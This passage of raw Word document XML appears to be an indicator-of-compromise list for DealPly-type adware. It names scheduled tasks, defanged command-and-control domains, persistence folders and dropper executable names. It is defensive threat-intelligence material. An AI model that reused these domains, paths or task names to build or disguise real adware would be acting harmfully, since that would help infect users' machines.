        <w:t>Known Scheduled Task Names:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B61C9A" w:rsidRPr="003E3A1F" w:rsidRDefault="003E3A1F" w:rsidP="00B61C9A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{&lt;random ID&gt;}”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00896549" w:rsidRDefault="00896549" w:rsidP="00B61C9A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Chromium </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3A1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5 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> chars&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B61C9A" w:rsidRPr="003E3A1F" w:rsidRDefault="003E3A1F" w:rsidP="00B61C9A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622F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Search Provider by Bing </w:t>
      </w:r>
      <w:r w:rsidR="00B61C9A" w:rsidRPr="003E3A1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5 </w:t>
      </w:r>
      <w:r w:rsidR="00B61C9A" w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> chars&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3A1F" w:rsidRPr="003E3A1F" w:rsidRDefault="003E3A1F" w:rsidP="003E3A1F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622F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Secured </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Yahoo Powered &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> chars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3A1F" w:rsidRPr="003E3A1F" w:rsidRDefault="003E3A1F" w:rsidP="003E3A1F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3E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Yahoo! Powered &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> chars&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B61C9A" w:rsidRPr="003E3A1F" w:rsidRDefault="003E3A1F" w:rsidP="003E3A1F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 w:rsidR="00B61C9A" w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Speedial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B61C9A" w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B61C9A" w:rsidRPr="003E3A1F" w:rsidRDefault="00B61C9A" w:rsidP="00B61C9A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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>UpdateTask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001622F5" w:rsidRPr="001622F5" w:rsidRDefault="00B61C9A" w:rsidP="00B61C9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AppCloudUpdater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRDefault="00896549" w:rsidP="00896549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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Go_Palikan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRDefault="00F842CB" w:rsidP="00072991">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRDefault="00072991" w:rsidP="00072991">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00266BFC" w:rsidRPr="00BC3AEA" w:rsidRDefault="00266BFC" w:rsidP="00072991">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Known C2 servers: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gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>d3tq9gtc0bxu1s[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cloudfront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net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gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>d3s1tkg9f4254q[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cloudfront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net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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>katunaq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com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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>hoduqoq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com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gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>d274eq41c39r2n[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cloudfront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net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gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>d1hpofzsaxmzog[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cloudfront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net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gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>d2wv7denc1jx9z[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cloudfront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net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3A1F" w:rsidRPr="003E3A1F" w:rsidRDefault="003E3A1F" w:rsidP="003E3A1F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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>butapujo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com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00266BFC" w:rsidRPr="00072991" w:rsidRDefault="003E3A1F" w:rsidP="003E3A1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>rududulu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.]com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRDefault="00072991" w:rsidP="00072991">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006637CB" w:rsidRPr="00BC3AEA" w:rsidRDefault="006637CB" w:rsidP="006637CB">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Known </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>folders</w:t>
      </w:r>
      <w:r w:rsidR="00072991" w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRPr="00880F47" w:rsidRDefault="00880F47" w:rsidP="00072991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  <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880F47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>folder</w:t>
      </w:r>
      <w:r w:rsidR="006637CB" w:rsidRPr="00880F47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="006637CB" w:rsidRPr="00880F47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="nl-BE" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>C:\ProgramData\{</w:t>
      </w:r>
      <w:r w:rsidR="006637CB" w:rsidRPr="00880F47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>{&lt;random ID&gt;}</w:t>
      </w:r>
      <w:r w:rsidR="006637CB" w:rsidRPr="00880F47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="006637CB" w:rsidRPr="00880F47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRDefault="00880F47" w:rsidP="00072991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4random characters&gt;[.txt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880F47" w:rsidRDefault="00880F47" w:rsidP="00072991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dat1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880F47" w:rsidRDefault="00880F47" w:rsidP="00072991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dat2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880F47" w:rsidRPr="00072991" w:rsidRDefault="00880F47" w:rsidP="00072991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owLC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006637CB" w:rsidRDefault="006637CB" w:rsidP="008A5F20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8A5F20">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A5F20">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>userfolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A5F20">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="008A5F20" w:rsidRPr="008A5F20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A5F20">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A5F20" w:rsidRPr="008A5F20">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A5F20" w:rsidRPr="008A5F20">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\Roaming\</w:t>
      </w:r>
      <w:r w:rsidR="008A5F20">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;Random ID&gt;\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>”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ninst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ninstall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SyncTask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pdatetask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Sync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HelperUpdate.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880F47" w:rsidRPr="006637CB" w:rsidRDefault="00880F47" w:rsidP="00880F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ProductUpdate.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880F47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</w:p>
    <w:p w:rsidR="00072991" w:rsidRDefault="00072991" w:rsidP="00072991">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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072991">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>c:\Program Files\Common Files\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;Random ID&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00072991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”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ninst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ninstall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SyncTask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updatetask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Sync.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880F47" w:rsidRPr="003E3A1F" w:rsidRDefault="00880F47" w:rsidP="00880F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>HelperUpdate.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880F47" w:rsidRPr="00BC3AEA" w:rsidRDefault="00880F47" w:rsidP="00BC3AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ProductUpdate.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRDefault="00072991" w:rsidP="00072991">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRPr="00072991" w:rsidRDefault="00072991" w:rsidP="00072991">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRPr="00BC3AEA" w:rsidRDefault="00880F47" w:rsidP="00072991">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Other known source (adware installation) </w:t>
      </w:r>
      <w:r w:rsidR="00072991" w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>processes Task Names:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383D08" w:rsidRDefault="00383D08" w:rsidP="00072991">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>userfolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5F20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A5F20">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A5F20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Local\temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00072991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&lt;Random ID&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00072991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”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRDefault="00072991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 w:rsidRPr="006637CB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>DMGR2.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="006637CB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383D08" w:rsidRDefault="00383D08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imodu.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383D08" w:rsidRDefault="00383D08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ugane.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383D08" w:rsidRDefault="00383D08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sateni.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383D08" w:rsidRDefault="00383D08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iroli.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383D08" w:rsidRDefault="00383D08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roni.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C334F" w:rsidRDefault="007C334F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ocetit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C334F" w:rsidRPr="006637CB" w:rsidRDefault="007C334F" w:rsidP="00383D08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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6 to 10 random characters&gt;.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072991" w:rsidRDefault="00072991" w:rsidP="00072991">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="006637CB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526E6D" w:rsidRDefault="00526E6D" w:rsidP="00526E6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526E6D" w:rsidRPr="00BC3AEA" w:rsidRDefault="00526E6D" w:rsidP="00526E6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="26"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adware also known as</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526E6D" w:rsidRDefault="00526E6D" w:rsidP="00526E6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526E6D" w:rsidRDefault="00526E6D" w:rsidP="00526E6D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alPly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00526E6D" w:rsidRDefault="00526E6D" w:rsidP="00526E6D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alPly2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526E6D" w:rsidRPr="003E3A1F" w:rsidRDefault="00526E6D" w:rsidP="00526E6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="26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ealAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00266BFC" w:rsidRDefault="00266BFC" w:rsidP="00266BFC">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E3A1F" w:rsidRDefault="003E3A1F" w:rsidP="00266BFC">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E3A1F" w:rsidRDefault="003E3A1F" w:rsidP="00266BFC">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
